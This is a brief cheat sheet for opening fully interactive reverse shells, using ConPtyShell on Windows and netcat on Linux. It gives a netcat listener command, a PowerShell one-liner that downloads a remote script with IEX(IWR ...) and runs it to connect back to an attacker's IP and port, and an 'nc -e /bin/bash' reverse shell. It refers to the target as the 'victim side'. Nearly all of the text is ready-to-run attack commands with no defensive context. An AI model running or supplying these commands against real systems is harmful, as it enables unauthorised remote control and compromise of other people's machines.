ConPtyShell(pseudo concole)- a Fully Interactive Reverse Shell for Windows systems.
Client Side: Windows version >= 10 / 2019 1809 (build >= 10.0.17763) Server Side: any tcp listener, i.e. netcat
stty raw -echo; (stty size; cat) | nc -lvnp "port" -s "ip"
example : stty raw -echo; (stty size; cat) | nc -lvnp 88 -s 10.0.0.2
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell "ip" "port"
example : IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.1 88
For client/victim side~ Command should be initiated in powershell, not cmd
ClientSide : linux with netcat installed(most linux have nc) ServerSide : any tcp listener like, i.e. netcat (prefered machine - Kali/Parrot OS)
Note: if client side netcat is not installed, use :
brew install netcat
Use-
brew install netcat
nc -lnvp "port" -s "ip"
nc -e /bin/bash "ip" "port"